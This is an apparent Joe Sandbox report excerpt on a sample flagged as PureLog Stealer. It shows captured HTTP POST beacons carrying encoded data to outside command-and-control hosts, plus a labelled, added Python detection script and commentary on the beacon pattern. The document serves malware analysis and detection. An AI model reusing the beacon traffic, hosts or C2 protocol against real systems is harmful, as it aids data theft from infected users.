                          Data Ascii: zRU=SjM0pICMFDbjC3UAbm9dB6IcNDsGrpNRxZjaGc8RU9N3qR84ZzBGVi9Mx/BdwVmFYtrTak+NWpRpzZSAKAoUUDwM+r44PcPxviTGauRTZawTXxdOKHbj4ZDL70Fe7cRrEjtR5e4ID0iR5+TTwoZ2QAxHq3x96kONEM62BOsXONKqs9yShWvdQCLrJ6+YeUYNBLOHl+DE0UDkVKd4Kz8A0RTNdvRrxCatUQ==


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          7 | 192.168.2.6 | 49734 | 13.248.169.48 | 80 | 5956 | C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 07:58:37.243310928 CEST | 1739 | OUT | POST /cf3x/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.techacademy.store
                          Origin: http://www.techacademy.store
                          Referer: http://www.techacademy.store/cf3x/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 1244
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 53 6a 4d 30 70 49 43 4d 46 44 62 6a 43 33 55 41 62 6d 39 64 42 36 49 63 4e 44 73 47 72 70 4e 52 78 5a 6a 61 47 63 38 52 55 39 46 33 74 6e 49 34 4c 6c 4a 47 55 69 39 4d 38 66 42 59 77 56 6e 66 59 74 6a 74 61 6b 43 37 57 72 70 70 78 36 4b 41 62 42 6f 55 4e 7a 77 4d 33 4c 34 35 4c 63 4f 31 76 6d 33 43 61 75 42 54 5a 61 77 54 58 79 31 4f 4e 57 62 6a 72 4a 44 49 34 30 46 61 77 38 51 45 45 6c 46 42 35 65 30 79 44 46 43 52 2b 65 44 54 79 61 42 32 59 41 78 46 74 33 78 66 36 6b 53 53 45 4d 33 48 42 50 59 39 4f 4e 75 71 76 36 2f 59 78 55 6e 69 4f 42 2f 4c 4a 34 43 54 56 54 63 73 4a 37 79 6f 69 73 44 50 78 51 7a 34 57 2b 56 69 63 6a 31 6b 39 69 6e 52 46 34 30 47 37 78 6a 66 4d 70 70 4d 48 47 74 41 31 66 68 7a 56 79 34 2f 76 51 49 36 71 77 57 74 71 35 43 5a 74 4b 53 68 69 30 63 6e 2f 33 48 59 44 61 77 57 6d 78 78 68 7a 6b 67 6d 64 4a 43 6f 6d 7a 43 52 53 4d 38 73 42 6e 6d 4e 67 52 4a 61 2f 50 51 73 69 41 35 2b 37 43 43 68 65 32 32 77 69 46 52 71 38 39 2b 48 4b 72 68 56 76 6f 65 69 37 34 32 55 38 78 [TRUNCATED]
                          Data Ascii: zRU=SjM0pICMFDbjC3UAbm9dB6IcNDsGrpNRxZjaGc8RU9F3tnI4LlJGUi9M8fBYwVnfYtjtakC7Wrppx6KAbBoUNzwM3L45LcO1vm3CauBTZawTXy1ONWbjrJDI40Faw8QEElFB5e0yDFCR+eDTyaB2YAxFt3xf6kSSEM3HBPY9ONuqv6/YxUniOB/LJ4CTVTcsJ7yoisDPxQz4W+Vicj1k9inRF40G7xjfMppMHGtA1fhzVy4/vQI6qwWtq5CZtKShi0cn/3HYDawWmxxhzkgmdJComzCRSM8sBnmNgRJa/PQsiA5+7CChe22wiFRq89+HKrhVvoei742U8xwIJ3ZO2sNsgZdItcy4VHkk2oWaYeYWyCu2PRbDRxDNUOproytE+2SMJ3L0Vcv4jsN6skZBAu7smxwzkSoyeaaFrB0tIIdtUiKWW5864fHrqjbas86FZ5GEuLm/+V8DfnCVZB8IWrj+i4BBF8gCgo31iHlOdw2hP0GYZhddpV68UepjdJf6c0pnRiPDr1lD0o9xCON3u44wMdJB7t0EQsgVF5zH2/wzptCcoWlnK7k9Rg5eW3IluTmQpOCR248Q8N0EH05NckM4BOcoyr3UPfF5urowmy/oDPOeyBfI8+fdlTqyW9Rcu2s3pc0sW6077fdfsVJBLXdhfxvmfnOLlCCag1o6gc46gxKenWzeE5ObT6MW50DObwaUM8NFdGd0y01FrEwfR4rcSmncXqz2ebqlh4PDy7/eE6GZ9Y/TjFBl9X8VDtd729fUqMe8/eWRLOKhdYa3v68kVFw76h8LaQtgQjvbCm14C5Q5yZhtFwbq65dbEmH6WP8i/YCWm4gPBTZE9xl74DCC5hIms0w9SJBb5v9cJyidi0xl3hPETEz0cZYul9qNymVnZ2FOOnL9Q8bZ33kB68DQRBTFbDpc5ms9UEk7R96B/4Gi/7ia9FqSu05IW4zLPkoIAOWPEs80A3h6wsZNqx9TMNA6hQpYT+83aqlcgsZErJBw [TRUNCATED]


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          8 | 192.168.2.6 | 49735 | 13.248.169.48 | 80 | 5956 | C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 07:58:39.821866989 CEST | 432 | OUT | GET /cf3x/?hR1p0=vfrlb&zRU=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI= HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Host: www.techacademy.store
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Jul 18, 2024 07:58:40.281903028 CEST | 407 | IN | HTTP/1.1 200 OK
                          Server: openresty
                          Date: Thu, 18 Jul 2024 05:58:40 GMT
                          Content-Type: text/html
                          Content-Length: 267
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 68 52 31 70 30 3d 76 66 72 6c 62 26 7a 52 55 3d 66 68 6b 55 71 2f 50 34 5a 78 4c 45 48 7a 64 38 46 30 45 57 4c 4a 63 64 4b 7a 38 69 75 59 4a 42 79 71 37 63 56 2f 4d 78 4c 62 4a 52 70 43 67 42 47 68 35 59 57 52 6c 69 31 4b 31 57 34 7a 47 6a 54 39 44 69 4b 53 6d 55 56 72 35 78 39 34 61 78 46 78 45 58 61 67 55 51 33 76 38 4c 62 75 53 58 75 48 33 76 53 2f 45 48 5a 70 55 59 5a 7a 67 66 49 45 4c 76 34 75 50 35 7a 47 4d 71 39 72 77 2f 4f 67 39 55 6b 75 49 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?hR1p0=vfrlb&zRU=fhkUq/P4ZxLEHzd8F0EWLJcdKz8iuYJByq7cV/MxLbJRpCgBGh5YWRli1K1W4zGjT9DiKSmUVr5x94axFxEXagUQ3v8LbuSXuH3vS/EHZpUYZzgfIELv4uP5zGMq9rw/Og9UkuI="}</script></head></html>
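The sessions above all come from PID 5956 and share one shape: POSTs to a four-character directory (/d3vb/, /cf3x/, /qt04/) whose only form field is named zRU and whose bodies grow 208, 232 and then 1244 bytes (the full ladder is visible for www.techacademy.store), followed by a GET that carries zRU in the query string together with a second parameter hR1p0=vfrlb, every request sent with the same Firefox 40 User-Agent, and the process moving on to the next unrelated host after each cycle. None of the hosts in this section acknowledges the beacon (LiteSpeed 404 pages from one, a JavaScript redirect to /lander from an openresty host, a Cloudflare-fronted WordPress 404 from the third), so the traffic shape itself is the usable detection signal. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses raw requests in the form shown here and flags a process that sends this shape to two or more hosts. The trait thresholds (four traits per host, two hosts per process), the regex for the directory name, and the base64-looking filler in the constructed sample capture are assumptions made for the example; the User-Agent string is the one from the capture.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# User-Agent seen on every request in the capture (Firefox 40 dates from 2015).
UA_FIREFOX40 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"
# Assumption for this example: C2 directories look like /d3vb/, /cf3x/, /qt04/.
SHORT_DIR = re.compile(r"^/[a-z0-9]{4}/$")


def parse_request(raw):
    """Parse the request line, headers and (for form POSTs) body of one raw request."""
    head, _, body = raw.partition("\n\n")
    lines = head.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # first colon only; keeps 'rv:40.0' intact
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    is_form = headers.get("content-type", "").startswith("application/x-www-form-urlencoded")
    return {
        "method": method,
        "path": url.path,
        "query": parse_qs(url.query, keep_blank_values=True),
        "form": parse_qs(body.strip(), keep_blank_values=True) if method == "POST" and is_form else {},
        "host": headers.get("host", ""),
        "ua": headers.get("user-agent", ""),
        "length": int(headers.get("content-length", 0)),
    }


def host_indicators(reqs):
    """Traits matched by the requests one process sent to one host."""
    hits = []
    paths = {r["path"] for r in reqs}
    if len(paths) == 1 and SHORT_DIR.match(next(iter(paths))):
        hits.append("single_short_dir")
    posts = [r for r in reqs if r["method"] == "POST"]
    post_fields = {tuple(r["form"]) for r in posts}
    if posts and len(post_fields) == 1 and len(next(iter(post_fields))) == 1:
        hits.append("one_form_field")
        field = next(iter(post_fields))[0]
        if any(field in r["query"] for r in reqs if r["method"] == "GET"):
            hits.append("get_reuses_field")        # the GET ...?zRU=... after the POSTs
    sizes = [r["length"] for r in posts]
    if len(sizes) >= 2 and sizes == sorted(sizes) and len(set(sizes)) == len(sizes):
        hits.append("growing_post_sizes")          # the 208 -> 232 -> 1244 ladder
    if all(r["ua"] == UA_FIREFOX40 for r in reqs):
        hits.append("stale_firefox40_ua")
    return hits


def find_beaconing(captures, min_hits=4, min_hosts=2):
    """captures: iterable of (pid, raw_request). Returns {pid: {host: traits}} for
    processes showing at least min_hits traits against at least min_hosts hosts."""
    per_pid = defaultdict(lambda: defaultdict(list))
    for pid, raw in captures:
        req = parse_request(raw)
        per_pid[pid][req["host"]].append(req)
    flagged = {}
    for pid, hosts in per_pid.items():
        scored = {h: host_indicators(rs) for h, rs in hosts.items()}
        scored = {h: t for h, t in scored.items() if len(t) >= min_hits}
        if len(scored) >= min_hosts:
            flagged[pid] = scored
    return flagged


def _request(host, method, target, body=None, ua=UA_FIREFOX40):
    """Build raw request text in the shape of the capture (CONSTRUCTED sample data)."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}", f"User-Agent: {ua}", "Connection: close"]
    if body is not None:
        lines += ["Content-Type: application/x-www-form-urlencoded", f"Content-Length: {len(body)}"]
    return "\n".join(lines) + "\n\n" + (body or "")


# CONSTRUCTED sample capture: one PID, the three hosts from the report, the
# 208/232/1244-byte POST ladder plus the GET for two of them, two POSTs for the
# third, and an unrelated browser request from another PID as a negative control.
_FILLER = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo"   # base64-looking filler, not real C2 data


def _body(n):
    return ("zRU=" + _FILLER * 40)[:n]


SAMPLE_CAPTURE = []
for _host, _dir in (("www.ancuapengiu28.com", "d3vb"), ("www.techacademy.store", "cf3x")):
    for _n in (208, 232, 1244):
        SAMPLE_CAPTURE.append((5956, _request(_host, "POST", f"/{_dir}/", _body(_n))))
    SAMPLE_CAPTURE.append((5956, _request(_host, "GET", f"/{_dir}/?zRU={_FILLER}=&hR1p0=vfrlb")))
for _n in (208, 232):
    SAMPLE_CAPTURE.append((5956, _request("www.goodneighbor.club", "POST", "/qt04/", _body(_n))))
SAMPLE_CAPTURE.append((4120, _request("www.example.org", "GET", "/index.html", ua="Mozilla/5.0 Firefox/128.0")))

if __name__ == "__main__":
    for pid, hosts in find_beaconing(SAMPLE_CAPTURE).items():
        for host, traits in hosts.items():
            print(pid, host, traits)
```

Requiring the pattern against two hosts from one PID is what keeps a single parked domain or a legitimate form POST from tripping the rule; raising min_hits to 5 drops www.goodneighbor.club, for which the capture contains no GET, which is the trade-off to make when only part of a cycle has been seen.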


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          9 | 192.168.2.6 | 49736 | 162.159.134.42 | 80 | 5956 | C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 07:58:45.371663094 CEST | 702 | OUT | POST /qt04/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.goodneighbor.club
                          Origin: http://www.goodneighbor.club
                          Referer: http://www.goodneighbor.club/qt04/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 208
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 55 68 39 46 52 6a 35 52 6a 45 51 72 63 57 53 76 51 78 4d 45 71 62 65 52 6f 67 6d 4d 6b 37 55 34 6e 78 30 5a 4b 68 71 4f 38 75 4c 43 71 4a 54 43 58 42 4a 46 32 43 47 47 56 35 73 73 2f 36 43 74 37 6e 6f 32 35 4b 65 31 73 76 57 76 42 52 6d 41 67 4d 71 62 59 76 79 58 59 33 68 64 35 47 66 67 38 50 43 2f 61 2b 71 55 63 69 76 56 44 71 56 6a 45 51 59 75 79 69 74 51 70 73 70 39 34 70 54 47 54 4f 45 51 73 37 34 61 61 6d 52 6a 4a 36 6b 68 57 70 73 53 65 48 73 4b 38 37 41 37 53 74 79 2b 79 59 65 36 6d 73 53 41 41 32 4b 58 48 2b 62 52 6a 33 72 63 51 38 31 35 31 6a 58 42 42 32 39 66 4e 4a 52 59 38 68 51 62 64 68 5a 71
                          Data Ascii: zRU=Uh9FRj5RjEQrcWSvQxMEqbeRogmMk7U4nx0ZKhqO8uLCqJTCXBJF2CGGV5ss/6Ct7no25Ke1svWvBRmAgMqbYvyXY3hd5Gfg8PC/a+qUcivVDqVjEQYuyitQpsp94pTGTOEQs74aamRjJ6khWpsSeHsK87A7Sty+yYe6msSAA2KXH+bRj3rcQ8151jXBB29fNJRY8hQbdhZq


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          10 | 192.168.2.6 | 49737 | 162.159.134.42 | 80 | 5956 | C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 18, 2024 07:58:47.945039034 CEST | 726 | OUT | POST /qt04/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.goodneighbor.club
                          Origin: http://www.goodneighbor.club
                          Referer: http://www.goodneighbor.club/qt04/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 232
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Data Raw: 7a 52 55 3d 55 68 39 46 52 6a 35 52 6a 45 51 72 4f 6d 69 76 44 57 67 45 2f 4c 65 51 6b 41 6d 4d 75 62 55 30 6e 78 34 5a 4b 67 76 56 38 38 2f 43 71 6f 6a 43 55 41 4a 46 6d 53 47 47 4e 70 73 74 67 71 43 36 37 6e 6b 55 35 4c 79 31 73 73 71 76 42 56 69 41 67 37 47 59 5a 2f 79 56 41 48 68 66 33 6d 66 67 38 50 43 2f 61 2f 4f 75 63 6d 4c 56 44 61 46 6a 46 78 59 74 78 69 74 54 67 4d 70 39 38 70 54 43 54 4f 45 35 73 2f 77 6b 61 6b 5a 6a 4a 2f 41 68 58 38 59 56 55 48 73 51 79 62 42 59 56 49 72 6b 39 4c 58 6b 74 2b 32 6b 64 78 4b 78 50 6f 61 4c 2f 45 72 2f 43 73 56 37 31 68 50 7a 42 57 39 31 50 4a 70 59 75 32 63 38 53 56 38 4a 6a 58 6f 47 76 57 67 58 4c 64 70 44 33 47 48 76 4c 32 47 36 70 67 3d 3d
                          Data Ascii: zRU=Uh9FRj5RjEQrOmivDWgE/LeQkAmMubU0nx4ZKgvV88/CqojCUAJFmSGGNpstgqC67nkU5Ly1ssqvBViAg7GYZ/yVAHhf3mfg8PC/a/OucmLVDaFjFxYtxitTgMp98pTCTOE5s/wkakZjJ/AhX8YVUHsQybBYVIrk9LXkt+2kdxKxPoaL/Er/CsV71hPzBW91PJpYu2c8SV8JjXoGvWgXLdpD3GHvL2G6pg==
                          Jul 18, 2024 07:58:49.249067068 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                          Date: Thu, 18 Jul 2024 05:58:49 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Ray: 8a503df80991c3f3-EWR
                          CF-Cache-Status: DYNAMIC
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Content-Encoding: gzip
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Link: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"
                          Vary: Accept-Encoding
                          ki-cache-type: None
                          Ki-CF-Cache-Status: BYPASS
                          ki-edge: v=20.2.7;mv=3.0.6
                          ki-origin: g1p
                          X-Content-Type-Options: nosniff
                          X-Edge-Location-Klb: 1
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SEQf5%2FIrQiQoCKW%2FBybMEY41uWUgUEQS7raVchR2BnLK1CgurKUN0mU%2FOMTVQ1%2BqFQSOm40h3LJ1hwTW0ZICJXmRoZuR%2BrEvdD4U8OB8q0EiWa%2Fuh6110%2Fw3cNWwurO5d2R6I55Yug%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          alt-svc: h3=":443"; ma=86400
                          Data Raw: 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd eb 9a db 38 92 28 f8 db fe be 7d 07 9a e5 4a 49 9d 24 53 52 5e 6c 4b 96 7d 5c 2e 57 b7 67 7c a9 f5 a5 fb f4 38 fd e9 50 22 a5 a4 4d 89 6a 92 ca 74 b6 ac 7d 8d 7d a0 7d b1 8d 0b 00 82 37 5d 32 5d 3d 33 df 39 ae ee 14 09 04 02 81 40 20 10 11 00 81 c7 f7 bc 68 9c 5e 2f 7c e3 22 9d 85 4f ee 3e c6 1f 23 74 e7 d3 81 e9 cf ed 8f ef 4d 4c f3 5d ef c9 dd 3b 8f 67 7e ea 1a e3 0b 37 4e fc 74 60 7e fc f0 9b fd d0 54 e9 73 77 e6 0f cc cb c0 bf 5a 44 71 6a 1a e3 68 9e fa 73 80 bb 0a bc f4 62 e0 f9 97 c1 d8 b7 e9 c5 32 82 79 90 06 6e 68 27 63 37 f4 07 1d c2 12 06 f3 af 46 ec 87 03 73 11 47 93 20 f4 4d e3 22 f6 27 03 f3 22 4d 17 49 ef e8 68 3a 5b 4c 9d 28 9e 1e 7d 9b cc 8f 3a 5c 28 0d d2 d0 7f f2 bb 3b f5 8d 79 94 1a 93 68 39 f7 8c 83 9f 1e 76 3b 9d be f1 e7 28 f2 8c 37 7e
                          Data Ascii: "3556" (chunk size line, 0x3556 bytes) followed by a gzip stream (1f 8b 08 ...); the compressed body is not printable, see Data Raw
                          Jul 18, 2024 07:58:49.249186993 CEST | 1236 | IN | Data Raw: 30 bd 18 45 b1 f1 3c 5c 8e 1e 1f 71 81 bb 1a cd 8d 38 1a 45 69 d2 50 14 37 66 ee 37 3b 98 01 4e 7b 11 fb d8 a2 5e e8 c6 53 bf 61 1c 41 c1 64 1c 07 8b f4 c9 55 30 f7 a2 2b 67 78 35 76 8d 81 a1 bf 7d ff 6e 7c fa dc 7f 7c 24 00 ff af bb 59 cb 1a de
                          Data Ascii: (gzip-compressed chunk continuation, not printable)
                          Jul 18, 2024 07:58:49.249200106 CEST | 1236 | IN | Data Raw: 44 49 fa 1a 18 0d 1c 6e 9a 87 13 27 8d de d3 94 db 6c 1d 9a 90 f0 a9 30 0b 27 2d 6b a9 c1 58 0b ed e5 b3 f3 25 0a e6 4d 90 40 28 0b 9d 64 c2 0c 88 2c c7 2a 9b 30 82 ac 15 d2 d0 33 71 64 1e 7d 71 a1 41 3c 3e d6 38 bc 11 90 59 d1 ac 68 4b 33 6e 59
                          Data Ascii: (gzip-compressed chunk continuation, not printable)
                          Jul 18, 2024 07:58:49.250176907 CEST | 1236 | IN | Data Raw: 84 ec 15 ae 96 08 65 f2 10 98 bf 23 86 f1 32 46 81 dd b5 eb 1d ae cc f7 60 84 0a de 1e 1f 1f f7 a3 85 3b 06 5b ac d7 d9 b7 56 c1 81 bd 2b 2f 8b 86 52 d4 93 c9 8e 44 78 d7 e0 48 06 e3 7d 89 10 c5 6e da 06 59 7c 97 b6 9c b6 1f 3e f0 4f fb 6a a4 e5
                          Data Ascii: (gzip-compressed chunk continuation, not printable)
                          Jul 18, 2024 07:58:49.250190973 CEST | 1236 | IN | Data Raw: dd 73 27 30 04 ac 7d 4a 8c fc 49 14 e3 0c c5 36 a2 69 98 6a 7e 4a 71 4d 62 ff ea 57 d9 3e 81 7d 0a 8b 3e 12 43 30 db aa d3 97 26 91 50 fa 7b a1 2b 6f d7 a9 95 db 88 25 74 93 d8 5e e5 f7 0c 5d 5d 44 c9 90 8b a9 9d 43 62 0a 23 e2 8a 2e 69 be 06 f4
                          Data Ascii: (gzip-compressed chunk continuation, not printable)
                          Jul 18, 2024 07:58:49.250957012 CEST | 1236 | IN | Data Raw: 3c 3e 2c 01 f3 de 76 93 05 06 a0 08 ad 6d 27 ff 58 c2 2c d6 33 3a fd 4d 50 27 f6 71 cf 38 39 3a de 08 74 6c 9f f4 8c e3 a3 93 2d 40 5d 04 ea 6e 04 ea 62 75 dd 2d d5 75 ce ec 47 40 f7 d9 d1 a3 8d 60 8f 00 b0 67 3c 3a ea 9c 15 c0 88 d7 36 74 0c 74
                          Data Ascii: (gzip-compressed chunk continuation, not printable)
                          Jul 18, 2024 07:58:49.250972033 CEST1236INData Raw: d4 73 03 9d 75 83 5a f6 d7 55 37 a8 64 5f 1d 75 e3 2a 6a 75 53 b1 15 85 e5 88 2c 62 a6 ad cd 6a ab 8b 15 f5 6a 91 ee cd b8 77 91 c3 8a 15 8a 5b 91 b4 4b 05 bb 8e c7 ba b5 8b db 11 b8 4f 4d db 29 ad 58 da f8 91 e4 55 a0 af 92 b1 ed 2b 1e b7 22 6a
                          Data Ascii: suZU7d_u*juS,bjjw[KOM)XU+"jUshBXi0nUm]mr!'QmA\UU9LuzV*nUMKJ?R*zi`R|n[;?p\L2EtL$>T
                          Jul 18, 2024 07:58:49.252002954 CEST1236INData Raw: 9d 2b e2 7a 1e 17 c1 ea 46 6e 6c fb df 16 ee dc 6b b4 fa 97 6e 6c dc bf 44 ad 98 0c 40 e2 e9 d5 fb 35 ba 9a 13 3c 26 15 ab 9f c0 58 69 36 1c 81 08 7e 80 ee d0 9f 4f d3 8b 32 a9 55 b0 bb 91 2f 69 da 8a 4e 35 2d 87 ce b8 b2 c1 5a 30 5b 4e ec cf a2
                          Data Ascii: +zFnlknlD@5<&Xi6~O2U/iN5-Z0[NK_4^bAz61\jbATJZ407UjhcAg,4{,QL=J({q:7'cW=i!`RbLfl{ 0X$Ab_I$hk
                          Jul 18, 2024 07:58:49.252017975 CEST1236INData Raw: 8b 74 59 39 3f 5b e6 35 88 8f 06 4b af 9c 2a 20 f9 71 cd 46 bc d8 58 06 2c 65 6e f5 ca dc 76 32 5e 5b cc ba 2a a0 ac 03 2c c1 cd 4a 28 ce b2 98 55 55 10 9c 23 00 2a 71 88 2c 0b 99 57 95 8f e9 94 59 59 9a 32 2c 60 6c 55 26 24 63 56 65 41 4c b7 88
                          Data Ascii: tY9?[5K* qFX,env2^[*,J(UU#*q,WYY2,`lU&$cVeALDagWM9*)0e;lhj3_v4Q`v%Mzyds2VU9GV'T~,CLy5x;ZMz;2~AO~Nb6
                          Jul 18, 2024 07:58:49.252736092 CEST1236INData Raw: 6a eb be 38 e2 1c 7d 61 eb 3e e9 6b 4c 73 a1 7b 87 e2 0d 95 bc 78 8e fd 64 01 fd 1f 5c 0a 23 5b cb c3 58 b3 7a 19 34 16 76 bb b1 c6 61 78 25 56 dd e8 94 5e 3e 8b ca 90 07 b8 db f2 00 77 5e c7 33 f8 24 5f 5c 95 c2 d9 24 74 af e5 2f 7f 7f 6f 00 52
                          Data Ascii: j8}a>kLs{xd\#[Xz4vax%V^>w^3$_\$t/oRcKk|P=D]$+qCDXE2Jsl``rBo&mg&j0:TBs6~d>iPjD%!bY2+vY*'RUc2lJ.Z90@:*V>Y9&>6G%Yh
                          Jul 18, 2024 07:58:49.257628918 CEST1236INData Raw: c6 27 61 68 e1 47 f7 2f 72 b2 07 b9 16 d9 98 24 14 f4 74 6f d0 3e 38 78 b3 c4 c0 9e 13 24 78 16 fb d4 8f 39 eb 48 35 09 e6 b0 8c 32 65 91 28 6f 52 a3 63 2d f1 0e 06 ed ef df 77 c1 4b 77 74 fa 03 59 e8 69 83 13 1a 3d 34 aa 73 95 56 8e 78 c8 44 6b
                          Data Ascii: 'ahG/r$to>8x$x9H52e(oRc-wKwtYi=4sVxDk~UF$|><x=ElwEH6|l3-vICE-CY.BvlT9[bYE#W|Vh\/6yeKNIg~RyVQkUW


                          Session ID:11
                          Source IP:192.168.2.6
                          Source Port:49738
                          Destination IP:162.159.134.42
                          Destination Port:80
                          PID:5956
                          Process:C:\Program Files (x86)\McEirohKWUkqujMrtjMiNZKWqtdmjbsDRNUXeiFWQcvHRUhtEkxQVAZGksndZFPlESH\YIJBuAgnqfKMtZ.exe
                          Timestamp:Jul 18, 2024 07:58:50.530704975 CEST
                          Bytes transferred:1739
                          Direction:OUT
                          Data:POST /qt04/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US,en
                          Accept-Encoding: gzip, deflate, br
                          Host: www.goodneighbor.club
                          Origin: http://www.goodneighbor.club
                          Referer: http://www.goodneighbor.club/qt04/
                          Cache-Control: no-cache
                          Content-Type: application/x-www-form-urlencoded
                          Connection: close
                          Content-Length: 1244
                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                          Timestamp:Jul 18, 2024 07:58:51.685472965 CEST
                          Bytes transferred:1236
                          Direction:IN
                          Data:HTTP/1.1 404 Not Found
                          Date: Thu, 18 Jul 2024 05:58:51 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Ray: 8a503e082d0d4246-EWR
                          CF-Cache-Status: DYNAMIC
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Content-Encoding: gzip
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Link: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"
                          Vary: Accept-Encoding
                          ki-cache-type: None
                          Ki-CF-Cache-Status: BYPASS
                          ki-edge: v=20.2.7;mv=3.0.6
                          ki-origin: g1p
                          X-Content-Type-Options: nosniff
                          X-Edge-Location-Klb: 1
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ad0W2w0wl6If6OWHGdWt13wNg%2BIKcMVl3xFBOM4VB72RaAXN67ITfJ7x%2BhWgwldMTC%2FIiNRbS2lWx2wf8rBFSpFkq6vUnihvUfSUcXS1cHake1zvFsMBAbBB2THdrosZhi7s4D6ZjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          alt-svc: h3=":443"; ma=86400



                          Target ID:0
                          Start time:01:56:44
                          Start date:18/07/2024
                          Path:C:\Users\user\Desktop\Inquiry files v2.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Inquiry files v2.exe"
                          Imagebase:0xaa0000
                          File size:807'432 bytes
                          MD5 hash:9C2717586122DB3E57BA56513F66E1B8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2227220590.0000000007630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
